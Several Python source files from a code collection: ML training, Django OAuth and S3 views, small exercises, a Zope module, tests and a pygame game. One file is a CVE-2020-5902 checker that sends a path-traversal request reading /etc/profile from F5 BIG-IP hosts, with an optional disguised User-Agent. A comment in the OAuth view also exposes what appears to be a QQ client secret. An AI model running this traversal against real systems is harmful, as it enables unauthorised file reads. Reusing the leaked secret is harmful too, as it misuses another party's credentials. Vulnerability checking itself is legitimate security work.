torch.nn.utils import clip_grad_norm\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom sklearn import preprocessing\nfrom sklearn.metrics import log_loss\n\nfrom nltk.stem import SnowballStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\nfrom convrnn import ConvRNNLSTMFeat\nsys.path.append('../utils/')\nfrom data import TacoText\nfrom preprocess import clean_and_tokenize, pad_and_shape\nfrom pipeline import pipeline\n\n\ndef get_glove_embeddings(file_path, corpus, ntoken, nemb):\n file_name = '/glove.6B.{}d.txt'.format(nemb)\n f = open(file_path+file_name, 'r')\n embeddings = torch.nn.init.xavier_uniform(torch.Tensor(ntoken, nemb))\n for line in f:\n split_line = line.split()\n word = split_line[0]\n if word in corpus:\n embedding = torch.Tensor([float(val) for val in split_line[1:]])\n embeddings[corpus[word]] = embedding\n return embeddings\n\n\ndef evaluate(model, data_loader, cuda, d_in, n_feat):\n correct, total = 0, 0\n pred_list = []\n true_list = []\n for ind, (qs, duplicate) in enumerate(data_loader):\n out = model(qs[:, 0, 0, :d_in].long(), qs[:, 0, 1, :d_in].long(), qs[:, 0, 2, :n_feat])\n pred = out.data.max(1)[1]\n if cuda:\n pred = pred.cuda()\n duplicate = duplicate.cuda()\n correct += (pred == duplicate).sum()\n total += len(pred)\n pred_list += list(out.exp()[:, 1].data.cpu().numpy())\n true_list += list(duplicate.cpu().numpy())\n return (correct / total), log_loss(true_list, pred_list, eps=1e-7)\n\n\ndef feature_gen(x):\n f = []\n f.append(abs(len(x[0]) - len(x[1]))) #WCDifference\n wic = len(set(x[0]).intersection(set(x[1])))\n f.append(wic) #NumWordsInCommon\n uw = len(set(x[0]).union(set(x[1])))\n f.append(uw) #Num unique words\n f.append(wic/uw) #Jaccard\n f.append(f[3]/len(set(x[0]))) #Pct Overlap Q1\n f.append(int((f[3]/len(set(x[0]))) < 0.1))\n f.append(int((f[3]/len(set(x[0]))) < 0.2))\n f.append(int((f[3]/len(set(x[0]))) < 0.3))\n f.append(int((f[3]/len(set(x[0]))) < 0.4))\n f.append(int((f[3]/len(set(x[0]))) < 0.5))\n f.append(f[3]/len(set(x[1]))) #Pct Overlap Q2\n f.append(int((f[3]/len(set(x[1]))) < 0.1))\n f.append(int((f[3]/len(set(x[1]))) < 0.2))\n f.append(int((f[3]/len(set(x[1]))) < 0.3))\n f.append(int((f[3]/len(set(x[1]))) < 0.4))\n f.append(int((f[3]/len(set(x[1]))) < 0.5))\n f.append(int((wic/uw) < 0.1))\n f.append(int((wic/uw) < 0.2))\n f.append(int((wic/uw) < 0.3))\n f.append(int((wic/uw) < 0.4))\n f.append(int((wic/uw) < 0.5))\n f.append(int(x[0][0].lower() == x[1][0].lower()))\n# for q in ('who','what','when','where','why','how','which'):\n# f.append(int(x[0][0].lower() == q))\n# f.append(int(x[1][0].lower() == q))\n return f\n\n\ndef main():\n parser = argparse.ArgumentParser(description='PyTorch PennTreeBank RNN/LSTM Language Model')\n parser.add_argument('--data', type=str, default='../data/',\n help='location of the data corpus')\n parser.add_argument('--presaved', action='store_true',\n help='use presaved data')\n parser.add_argument('--glovedata', type=str, default='../data/glove.6B',\n help='location of the pretrained glove embeddings')\n parser.add_argument('--din', type=int, default=30,\n help='length of LSTM')\n parser.add_argument('--demb', type=int, default=300,\n help='size of word embeddings')\n parser.add_argument('--dhid', type=int, default=300,\n help='number of hidden units per layer')\n parser.add_argument('--dlin', type=int, default=500,\n help='number linear transformation nodes')\n parser.add_argument('--dout', type=int, default=2,\n help='number of output classes')\n parser.add_argument('--nlayers', type=int, default=1,\n help='number of layers')\n parser.add_argument('--lr', type=float, default=0.001,\n help='initial learning rate')\n parser.add_argument('--wd', type=float, default=0.0,\n help='adam l2 weight decay')\n parser.add_argument('--clip', type=float, default=0.25,\n help='gradient clipping')\n parser.add_argument('--embinit', type=str, default='random',\n help='embedding weight initialization type')\n parser.add_argument('--decinit', type=str, default='random',\n help='decoder weight initialization type')\n parser.add_argument('--hidinit', type=str, default='random',\n help='recurrent hidden weight initialization type')\n parser.add_argument('--dropout', type=float, default=0.0,\n help='dropout applied to layers (0 = no dropout)')\n parser.add_argument('--rnn', type=str, default='lstm',\n help='lstm or gru')\n parser.add_argument('--epochs', type=int, default=40,\n help='upper epoch limit')\n parser.add_argument('--batchsize', type=int, default=20, metavar='N',\n help='batch size')\n parser.add_argument('--seed', type=int, default=3,\n help='random seed')\n parser.add_argument('--vocabsize', type=int, default=200000,\n help='random seed')\n parser.add_argument('--optimizer', action='store_true',\n help='use ADAM optimizer')\n parser.add_argument('--pipeline', action='store_true',\n help='use pipeline file')\n parser.add_argument('--psw', type=int, default=1,\n help='remove stop words')\n parser.add_argument('--ppunc', action='store_true',\n help='remove punctuation')\n parser.add_argument('--pntok', action='store_true',\n help='use number tokens')\n parser.add_argument('--pkq', action='store_true',\n help='keep question words')\n parser.add_argument('--stem', action='store_true',\n help='use stemmer')\n parser.add_argument('--lemma', action='store_true',\n help='use lemmatizer')\n parser.add_argument('--bidir', action='store_false',\n help='bidirectional')\n parser.add_argument('--freezeemb', action='store_false',\n help='freezes embeddings')\n parser.add_argument('--cuda', action='store_true',\n help='use CUDA')\n parser.add_argument('--loginterval', type=int, default=100, metavar='N',\n help='report interval')\n parser.add_argument('--save', type=str, default='',\n help='path to save the final model')\n args = parser.parse_args()\n\n \n\n if not args.presaved:\n pipe = None\n if args.pipeline:\n stemmer, lemmatizer = None, None\n if args.stem:\n stemmer = SnowballStemmer('english')\n elif args.lemma:\n lemmatizer = WordNetLemmatizer()\n\n pipe = functools.partial(pipeline, \n rm_stop_words=args.psw, \n rm_punc=args.ppunc, \n number_token=args.pntok, \n keep_questions=args.pkq,\n stemmer=stemmer,\n lemmatizer=lemmatizer)\n\n corpus = TacoText(args.vocabsize, lower=True, vocab_pipe=pipe)\n print('Loading Data')\n # train_data = pd.read_csv(args.data)\n #Shuffle order of training data\n\n train_data = pd.read_csv('../data/train_data_shuffle.csv')\n val_data = pd.read_csv('../data/val_data_shuffle.csv')\n\n train_data = train_data.iloc[:1000]\n val_data = val_data.iloc[:1000]\n\n print('Cleaning and Tokenizing')\n q1, q2, y = clean_and_tokenize(train_data, corpus)\n q1_val, q2_val, y_val = clean_and_tokenize(val_data, corpus)\n\n train_feat = list(map(feature_gen, zip(q1, q2)))\n val_feat = list(map(feature_gen, zip(q1_val, q2_val)))\n scalar = preprocessing.StandardScaler()\n train_feat = scalar.fit_transform(train_feat)\n val_feat = scalar.transform(val_feat)\n\n print('Piping Data')\n q1 = corpus.pipe_data(q1)\n q2 = corpus.pipe_data(q2)\n q1_val = corpus.pipe_data(q1_val)\n q2_val = corpus.pipe_data(q2_val)\n\n corpus.gen_vocab(q1 + q2 + q2_val + q1_val)\n\n n_feat = train_feat.shape[1]\n d_in = args.din\n feat_max = int(np.max([n_feat, d_in]))\n\n X = torch.Tensor(len(train_data), 1, 3, feat_max)\n X[:, 0, 0, :] = torch.from_numpy(corpus.pad_numericalize(q1, feat_max)).long()\n X[:, 0, 1, :] = torch.from_numpy(corpus.pad_numericalize(q2, feat_max)).long()\n X[:, 0, 2, :n_feat] = torch.from_numpy(np.array(train_feat))\n y = torch.from_numpy(np.array(y)).long()\n\n X_val = torch.Tensor(len(val_data), 1, 3, feat_max)\n X_val[:, 0, 0, :] = torch.from_numpy(corpus.pad_numericalize(q1_val, feat_max)).long()\n X_val[:, 0, 1, :] = torch.from_numpy(corpus.pad_numericalize(q2_val, feat_max)).long()\n X_val[:, 0, 2, :n_feat] = torch.from_numpy(np.array(val_feat))\n y_val = torch.from_numpy(np.array(y_val)).long()\n\n torch.save(X, '../data/X_feat.t')\n torch.save(y, '../data/y_feat.t')\n torch.save(X_val, '../data/X_val_feat.t')\n torch.save(y_val, '../data/y_val_feat.t')\n with open(args.save + '_corpus_feat.pkl', 'wb') as corp_f:\n pkl.dump(corpus, corp_f, protocol=pkl.HIGHEST_PROTOCOL)\n\n else:\n n_feat = 22\n d_in = args.din\n print('Loading Presaved Data')\n X = torch.load(args.data + 'X_feat.t')\n y = torch.load(args.data + 'y_feat.t')\n X_val = torch.load(args.data + 'X_val_feat.t')\n y_val = torch.load(args.data + 'y_val_feat.t')\n with open('../data/corpus_feat.pkl', 'rb') as f:\n corpus = pkl.load(f)\n\n\n if args.cuda:\n X, y = X.cuda(), y.cuda()\n X_val, y_val = X_val.cuda(), y_val.cuda()\n\n print('Generating Data Loaders')\n #X.size len(train_data),1,2,fix_length\n train_dataset = TensorDataset(X, y)\n train_loader = DataLoader(train_dataset, \n batch_size=args.batchsize, \n shuffle=True)\n valid_loader = DataLoader(TensorDataset(X_val, y_val),\n batch_size=args.batchsize,\n shuffle=False)\n\n ntokens = len(corpus)\n glove_embeddings = None\n if args.embinit == 'glove':\n assert args.demb in (50, 100, 200, 300)\n glove_embeddings = get_glove_embeddings(args.glovedata, corpus.dictionary.word2idx, ntokens, args.demb)\n\n model = ConvRNNLSTMFeat(args.din, args.dhid, args.dout, args.demb, args.dlin, args.vocabsize, \n args.dropout, args.embinit, args.hidinit, args.decinit, \n glove_embeddings, args.cuda, args.rnn, args.bidir, n_feat)\n\n if args.cuda:\n model.cuda()\n\n criterion = nn.NLLLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd)\n\n model_config = '\\t'.join([str(x) for x in (torch.__version__, args.rnn, args.bidir, args.clip, args.nlayers, args.din, args.demb, args.dhid, args.dlin,\n args.embinit, args.decinit, args.hidinit, args.dropout, args.optimizer, args.lr, args.wd, args.vocabsize,\n args.pipeline, args.psw, args.ppunc, args.pntok, args.pkq, args.stem, args.lemma)])\n\n print('Pytorch | RNN | BiDir | Clip | #Layers | InSize | EmbDim | HiddenDim | LinearDim | EncoderInit | DecoderInit | WeightInit | Dropout | Optimizer| LR | WeightDecay | VocabSize | pipeline | stop | punc | ntoken | keep_ques | stem | lemma')\n print(model_config)\n\n # best_val_acc = 0.78\n best_ll = 0.5\n for epoch in range(args.epochs):\n model.train()\n total_cost = 0\n start_time = time.time()\n cur_loss = 0\n for ind, (qs, duplicate) in enumerate(train_loader):\n model.zero_grad()\n pred = model(qs[:, 0, 0, :d_in].long(), qs[:, 0, 1, :d_in].long(), qs[:, 0, 2, :n_feat])\n if args.cuda:\n pred = pred.cuda()\n duplicate = duplicate.cuda()\n duplicate = Variable(duplicate)\n loss = criterion(pred, duplicate)\n loss.backward()\n clip_grad_norm(model.parameters(), args.clip)\n\n if optimizer:\n optimizer.step()\n else:\n for p in model.parameters():\n p.data.add_(-args.lr, p.grad.data)\n\n total_cost += loss.data[0]\n cur_loss += loss.data[0]\n\n if ind % args.loginterval == 0 and ind > 0:\n cur_loss = loss.data[0] / args.loginterval\n elapsed = time.time() - start_time\n print('| Epoch {:3d} | {:5d}/{:5d} Batches | ms/batch {:5.2f} | '\n 'Loss {:.6f}'.format(\n epoch, ind, len(X) // args.batchsize,\n elapsed * 1000.0 / args.loginterval, cur_loss))\n start_time = time.time()\n cur_loss = 0\n\n model.eval()\n train_acc, train_ll = evaluate(model, train_loader, args.cuda, d_in, n_feat)\n val_acc, val_ll = evaluate(model, valid_loader, args.cuda, d_in, n_feat)\n # if args.save and (val_acc > best_val_acc):\n if args.save and (val_ll < best_ll):\n with open(args.save + '_corpus.pkl', 'wb') as corp_f:\n pkl.dump(corpus, corp_f, protocol=pkl.HIGHEST_PROTOCOL)\n torch.save(model.cpu(), args.save)\n torch.save(model.cpu().state_dict(), args.save + \".state_dict\")\n with open(args.save + \".state_dict.config\", \"w\") as f:\n f.write(model_config)\n best_ll = val_ll\n if args.cuda:\n model.cuda()\n\n\n print('Epoch: {} | Train Loss: {:.4f} | Train Accuracy: {:.4f} | Val Accuracy: {:.4f} | Train LL: {:.4f} | Val LL: {:.4f}'.format(\n epoch, total_cost, train_acc, val_acc, train_ll, val_ll))\n print('-' * 89)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"models/convrnnLSTM_main_feat.py","file_name":"convrnnLSTM_main_feat.py","file_ext":"py","file_size_in_byte":14636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168681181","text":"from django.shortcuts import render\n\nfrom rest_framework.views import APIView\nfrom QQLoginTool.QQtool import OAuthQQ\nfrom rest_framework.response import Response\nfrom django.conf import settings\nfrom rest_framework import status\nfrom rest_framework_jwt.settings import api_settings\nimport logging\n\nfrom .models import OAuthQQUser\nfrom .utils import generate_save_user_token\nfrom .serializers import QQAuthUserSerializer\n\nlogger = logging.getLogger('django')\n\n\n# Create your views here.\nclass QQOauthURLView(APIView):\n \"\"\" 拼接好QQ登录地址 \"\"\"\n\n def get(self, request):\n # 1. 提取前端传入的next参数,记录用户从哪里去到的login界面\n # get(self, key, default_None), 获取key指定的值,如果获取的key不存在,返回default参数的值\n next = request.query_params.get('next', '/')\n # # QQ登录参数\n # QQ_CLIENT_ID = '101514053'\n # QQ_CLIENT_SECRET = '1075e75648566262ea35afa688073012'\n # QQ_REDIRECT_URI = 'http://www.meiduo.site:8080/oauth_callback.html'\n\n # 2.利用QQ登录SDK\n # oauth = OAuthQQ(client_id=appid, client_secret=appkey, redirect_uri=回调域名, state=记录来源)\n oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID, client_secret=settings.QQ_CLIENT_SECRET,\n redirect_url=settings.QQ_REDIRECT_URL, state=next)\n login_url = oauth.get_qq_url()\n # 调用里面的方法,拼接QQ登录网址\n return Response({'login_url': login_url})\n\n\nclass QQOauthUserView(APIView):\n \"\"\" QQ登录成功后的回调处理 \"\"\"\n\n def get(self, request):\n # 1. 获取前端传入的code\n code = request.query_params.get('code')\n if not code:\n return Response({'message': '缺少code'}, status=status.HTTP_400_BAD_REQUEST)\n # 2. 创建qq工具登录对象\n oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID, client_secret=settings.QQ_CLIENT_SECRET,\n redirect_url=settings.QQ_REDIRECT_URL)\n\n try:\n # 3.调用get_access_token(code),用code 向QQ服务器获取access_token\n access_token = oauth.get_access_token(code)\n # 4.调用oauth里面的get_open_id(access_token), 用access_token向QQ服务器获openid\n openid = oauth.get_open_id(access_token)\n except Exception as e:\n logger.info(e)\n return Response({'message': 'QQ服务器异常'}, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n try:\n # 5.查询数据库有没有这个openid\n authQQUserModel = OAuthQQUser.objects.get(openid=openid)\n except OAuthQQUser.DoesNotExist:\n # 6.如果openid 没有绑定用户,把openid 加密之后响应给前端 ,让前端先暂存一会 等待绑定时使用\n access_token_openid = generate_save_user_token(openid)\n return Response({'access_token': access_token_openid})\n\n else:\n # 7.如果openid已绑定美多用户 那么直接代表登录成功,给前端 返回JWT 状态保存信息\n user = authQQUserModel.user # 获取到openid 关联的user\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER # 引用jwt中的叫jwt_payload_handler函数(生成payload)\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER # 函数引用 生成jwt\n\n payload = jwt_payload_handler(user) # 根据user生成用户相关的载荷\n token = jwt_encode_handler(payload) # 传入载荷生成完整的jwt\n\n return Response({\n 'token': token,\n 'username': user.username,\n 'user_id': user.id\n })\n\n def post(self, request):\n \"\"\" openid 绑定用户接口 \"\"\"\n\n # 1.创建序列化器进行反序列化\n serializer = QQAuthUserSerializer(data=request.data)\n\n # 调用is_valid方法进行校验\n serializer.is_valid(raise_exception=True)\n\n # 调用序列化器的未save方法保存\n user = serializer.save()\n\n # 生成JWT进行状态保存token\n jwt_payload_handler = api_settings.JWT_PATLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HENDLER\n\n payload = jwt_payload_handler(user) # 根据用户生成相关的荷载\n token = jwt_encode_handler(payload) # 根据荷载生成完整的jwt\n\n return Response(\n {\n 'token': token,\n 'username': user.username,\n 'user_id': user.id,\n }\n )\n\n","sub_path":"meiduo_mall/meiduo_mall/apps/oauth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130445379","text":"rhyme = [\"Mary\", \"had\", \"a\", \"little\", \"lamb\", \"whose\", \"fleece\", \"was\", \"white\", \"as\", \"snow\"]\r\n\r\ndef wlcount(L):\r\n\tprint(len(rhyme)) #This prints the lenghth of the list(number of words)\r\n\tsum = 0\r\n\tfor i in range(11): #This is to print the number of letters.\r\n\t\tsum = sum + len(rhyme[i])\r\n\t\tprint (rhyme[i], len(rhyme[i]))\r\n\treturn sum\r\n\r\nprint(wlcount(rhyme))\r\n\r\n\t","sub_path":"poem.py","file_name":"poem.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336030506","text":"import os\nimport csv\n\n#function for increase\ndef getIncrease(curr,prev):\n increase = curr - prev\n return increase\n\ncsvpath = os.path.join('Resources', 'budget_data.csv')\n\nmonthCount = 0\ngIncrease = 0\ngDec = 0\nchange =0 \ncurrentIncrease = 0\ncurrentMonth = 0\nprevMonth = 0\ntotal = 0\n\nwith open(csvpath, newline='') as csvfile:\n\n # CSV reader specifies delimiter and variable that holds contents\n csvreader = csv.reader(csvfile, delimiter=',')\n\n # Read the header row first (skip this step if there is now header)\n csv_header = next(csvreader)\n\n # Read each row of data after the header\n for row in csvreader:\n monthCount += 1\n total = total + float(row[1])\n\n if(monthCount != 0):\n currentMonth= float(row[1])\n change = getIncrease(currentMonth,prevMonth)\n\n currentIncrease = currentIncrease + change\n prevMonth=currentMonth \n else:\n # currentIncrease+= float(row[1])\n prevMonth=float(row[1])\n\n #check for greatest increase and greatest decrease in profits\n if(change >= 0 and change > gIncrease):\n gIncrease= change\n gMonth = row[0]\n elif(change<0 and change < gDec):\n gDec = change\n iMonth = row[0]\n \n averIncrease=currentIncrease/(monthCount - 1)\n # print(1170593 - -755566)\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {monthCount}\")\nprint(f\"Total: ${int(total)}\")\nprint(f\"Average Change: ${round(averIncrease,2)}\")\nprint(f\"Greatest Increase in Profits: {gMonth} ({int(gIncrease)})\")\nprint(f\"Greatest Decrease in Profits: {iMonth} ({int(gDec)})\")\n\nf=open(\"financial_analysis.txt\", 'w')\nf.write(\"Financial Analysis \\n\")\nf.write(\"----------------------------\\n\")\nf.write(f\"Total Months: {monthCount}\\n\")\nf.write(f\"Total: ${int(total)}\\n\")\nf.write(f\"Average Change: ${round(averIncrease,2)}\\n\")\nf.write(f\"Greatest Increase in Profits: {gMonth} ({int(gIncrease)})\\n\")\nf.write(f\"Greatest Decrease in Profits: {iMonth} ({int(gDec)})\")\nf.close()","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539568825","text":"##############################################################################\n#\n# Copyright (c) 2007 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"\n$Id: __init__.py 97 2007-03-29 22:58:27Z rineichen $\n\"\"\"\n\nimport zope.component\nfrom zope.app.exception.systemerror import SystemErrorView\nfrom zope.app.exception.browser.unauthorized import Unauthorized\nfrom zope.app.exception.browser.user import UserErrorView\nfrom zope.app.exception.browser.notfound import NotFound\nfrom zope.app.security.interfaces import IAuthentication\nfrom z3c.template.interfaces import IContentTemplate\nfrom z3c.pagelet import browser\n\n\nclass SystemErrorPagelet(browser.BrowserPagelet, SystemErrorView):\n \"\"\"SystemError pagelet.\"\"\"\n\n\nclass UnauthorizedPagelet(browser.BrowserPagelet, Unauthorized):\n \"\"\"Unauthorized pagelet.\"\"\"\n\n def render(self):\n # Set the error status to 403 (Forbidden) in the case when we don't\n # challenge the user\n self.request.response.setStatus(403)\n\n # make sure that squid does not keep the response in the cache\n self.request.response.setHeader(\n 'Expires', 'Mon, 26 Jul 1997 05:00:00 GMT')\n self.request.response.setHeader(\n 'Cache-Control', 'no-store, no-cache, must-revalidate')\n self.request.response.setHeader('Pragma', 'no-cache')\n\n principal = self.request.principal\n auth = zope.component.getUtility(IAuthentication)\n auth.unauthorized(principal.id, self.request)\n if self.request.response.getStatus() not in (302, 303):\n template = zope.component.getMultiAdapter((self, self.request),\n IContentTemplate)\n return template(self)\n\n\nclass UserErrorPagelet(browser.BrowserPagelet, UserErrorView):\n \"\"\"UserError pagelet.\"\"\"\n\n\nclass NotFoundPagelet(browser.BrowserPagelet, NotFound):\n \"\"\"NotFound pagelet.\"\"\"\n\n def render(self):\n self.request.response.setStatus(404)\n template = zope.component.getMultiAdapter((self, self.request),\n IContentTemplate)\n return template(self)\n","sub_path":"z3c.layer.pagelet/tags/1.1.0/src/z3c/layer/pagelet/browser/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590905382","text":"import logging\n\nfrom botocore.exceptions import ClientError\nfrom botocore.client import Config\nfrom flask import abort\nfrom flask import Blueprint, render_template\nfrom jinja2 import TemplateNotFound\n\nimport boto3\n\ns3_form = Blueprint('s3_form', __name__)\n\nBUCKET_NAME = 'plomza-bucket'\nOBJECT_NAME = '${filename}'\nREGION_NAME = 'eu-central-1'\n\nconfig = Config(signature_version='s3v4', region_name=REGION_NAME)\n\nsession = boto3.session.Session()\n\n\ndef create_presigned_url(bucket_name, object_name, expiration=3600):\n s3_client = boto3.client('s3', config=config)\n try:\n response = s3_client.generate_presigned_url('get_object', Params={'Bucket': bucket_name, 'Key': object_name},\n ExpiresIn=expiration)\n except ClientError as e:\n logging.error(e)\n return None\n return response\n\n\ndef create_presigned_post(bucket_name, object_name,\n fields=None, conditions=None, expiration=3600):\n \"\"\"Generate a presigned URL S3 POST request to upload a file\n\n :param bucket_name: string\n :param object_name: string\n :param fields: Dictionary of prefilled form fields\n :param conditions: List of conditions to include in the policy\n :param expiration: Time in seconds for the presigned URL to remain valid\n :return: Dictionary with the following keys:\n url: URL to post to\n fields: Dictionary of form fields and values to submit with the POST\n :return: None if error.\n \"\"\"\n\n # Generate a presigned S3 POST URL\n s3_client = boto3.client('s3', config=config)\n try:\n response = s3_client.generate_presigned_post(bucket_name,\n object_name,\n Fields=fields,\n Conditions=conditions,\n ExpiresIn=expiration)\n except ClientError as e:\n logging.error(e)\n return None\n\n # The response contains the presigned URL and required fields\n return response\n\n\n@s3_form.route('/s3', methods=['POST', 'GET'])\ndef form():\n try:\n presigned_response = create_presigned_post(bucket_name=BUCKET_NAME, object_name=OBJECT_NAME)\n\n return render_template('s3_form.html', response=presigned_response)\n except TemplateNotFound:\n abort(404)\n\n\n@s3_form.route('/s3/files')\ndef get_objects():\n resource = session.resource('s3')\n my_bucket = resource.Bucket(BUCKET_NAME)\n objects = my_bucket.objects.all()\n data = [(obj.key, create_presigned_url(BUCKET_NAME, obj.key)) for obj in objects]\n\n return render_template('files.html', data=data)\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"326085103","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom pytest import raises\nfrom cottonformation.core.model import Tag, Parameter, constant\n\n\nclass TestTag:\n def test_init(self):\n with raises(TypeError):\n Tag()\n\n with raises(TypeError):\n Tag(1, 2)\n\n with raises(TypeError):\n Tag(\"k\", 1)\n\n with raises(ValueError):\n Tag(p_Key=\"key\" * 100, p_Value=\"value\")\n\n with raises(ValueError):\n Tag(p_Key=\"key\", p_Value=\"value\" * 100)\n\n\n tags = Tag.make_many(dict_data=dict(name=\"ctf\", stage=\"dev\"), creator=\"alice@example.com\")\n assert tags[0].p_Key == \"name\"\n assert tags[1].p_Key == \"stage\"\n assert tags[2].p_Key == \"creator\"\n\n def test_serialize(self):\n assert Tag(\"Name\", \"Alice\").serialize() == {\"Key\": \"Name\", \"Value\": \"Alice\"}\n p = Parameter(\"Name\", Type=Parameter.TypeEnum.String)\n assert Tag(\"Name\", p.ref()).serialize() == {\n \"Key\": \"Name\",\n \"Value\": {constant.IntrinsicFunction.REF: \"Name\"}\n }\n\n\nif __name__ == \"__main__\":\n import os\n\n basename = os.path.basename(__file__)\n pytest.main([basename, \"-s\", \"--tb=native\"])\n","sub_path":"tests/core/test_tag.py","file_name":"test_tag.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"166497562","text":"from termcolor import colored\r\nimport requests\r\nimport argparse\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\nmy_parser = argparse.ArgumentParser(description='Checker for CVE-2020-5902', epilog='Only for defensive purpouses')\r\nmy_parser.add_argument('mode',\r\n metavar='mode',\r\n type=str,\r\n help='Silent or signed User-Agent',\r\n choices=['silent', 'signed'],\r\n default='signed')\r\n\r\nmy_parser.add_argument('list',\r\n metavar='list',\r\n type=str,\r\n help='List with targets. ip:port. 1 per line',\r\n )\r\n\r\nmy_parser.add_argument('timeout',\r\n metavar='timeout',\r\n type=int,\r\n help='Timeout for requests (in seconds)',\r\n )\r\n\r\nargs = my_parser.parse_args()\r\nmode = args.mode\r\nlista = args.list\r\ntiempo = args.timeout\r\n\r\n\r\nif mode == 'signed':\r\n\tua = 'CVE-2020-5902 Checker. It reads profile from etc'\r\nelse:\r\n\tua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'\r\n\r\nheaders = {\r\n\t'User-Agent':ua\r\n}\r\n\r\nf = open(lista, 'r')\r\nlineas = f.readlines()\r\nf.close()\r\nv = 0\r\nprint(colored('[?] Targets loaded: ' + str(len(lineas)), 'blue'))\r\n\r\ndef check(host, port):\r\n target = 'https://' + host + ':' + str(port) + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/profile'\r\n #print(target)\r\n r = requests.get(target, headers=headers, verify=False, timeout=tiempo)\r\n if r.text.find('System wide environment and startup programs') != -1:\r\n print(colored('[-] ' + host + ':' + str(port) + ' is vulnerable to CVE-2020-5902', 'red'))\r\n print(colored('[?] Patch with K52145254', 'yellow'))\r\n global v\r\n v = v + 1\r\n else:\r\n print(colored('[+] ' + host + ':' + str(port) + ' is patched', 'green'))\r\n\r\nfor linea in lineas:\r\n linea.encode(\"utf-8\")\r\n linea = linea.split(':')\r\n host = linea[0]\r\n port = linea[1].replace('\\n','')\r\n check(host, port)\r\n\r\nprint(colored('[?] ' + colored(str(v),'red') + ' targets are vulnerable. ' + colored(str(round(v * 100 / len(lineas))) + '%', 'red'), 'blue'))\r\nprint(colored('[?] More vulnerability POCs at https://github.com/SadFud/Exploits', 'yellow'))","sub_path":"Real World/Others/CVE-2020-5902/CVE-2020-5902.py","file_name":"CVE-2020-5902.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"519876935","text":"import pygame, sys\nfrom pygame.locals import *\nfrom Level import *\n\nclass Scene():\n def __init__(self, s):\n self.screen = s\n \n self.clock = pygame.time.Clock()\n \n self.tiles = pygame.sprite.Group()\n self.water = pygame.sprite.Group()\n self.walls = pygame.sprite.Group()\n self.trees = pygame.sprite.Group()\n self.items = pygame.sprite.Group()\n self.tools = pygame.sprite.Group()\n self.bullets = pygame.sprite.Group()\n self.sprites = pygame.sprite.Group()\n self.player_group = pygame.sprite.Group()\n \n\nclass TextScreen():\n def __init__(self, s, text, color):\n self.screen = s\n self.text = text\n self.color = color\n \n def run(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n return\n \n if event.type == KEYDOWN:\n if event.key in [K_ESCAPE, K_RETURN]:\n return\n \n self.screen.fill(self.color)\n font = pygame.font.Font(None, 30)\n label = font.render(self.text, 1, (255, 255, 255))\n label_rect = label.get_rect()\n label_rect.center = ((self.screen.get_width() / 2, self.screen.get_height() / 2))\n self.screen.blit(label, label_rect)\n pygame.display.flip()\n \nclass Game(Scene):\n def __init__(self, s):\n Scene.__init__(self, s)\n \n level = Level(self)\n level.generate_random(self.screen.get_width() / 32, self.screen.get_height() / 32)\n \n self.trees = level.trees\n \n self.axe = Axe(self, [100, 100],self.sprites, self.tools, self.items)\n \n self.gun = Revolver(self, [200, 200], self.sprites)\n \n self.player = Player(self, [0, 0], self.sprites, self.player_group)\n \n self.finished = False\n \n self.running = False\n \n def run(self):\n self.running = True\n \n while self.running:\n for event in pygame.event.get():\n if event.type == QUIT: self.quit()\n \n if self.trees == 0: #self.quit()\n self.finished = True\n \n if self.finished:\n self.sprites.empty()\n return\n \n self.screen.fill([140, 255, 115])\n self.sprites.draw(self.screen)\n self.sprites.update()\n pygame.display.flip()\n self.clock.tick(60)\n \n \n def quit(self):\n pygame.quit()\n sys.exit(0)\n\nclass BossBattle(Scene):\n def __init__(self, s):\n Scene.__init__(self, s)\n \n self.boss = DreadMonster(self, self.sprites)\n self.gun = Revolver(self, [200, 200], self.sprites) \n self.player = Player(self, [0, 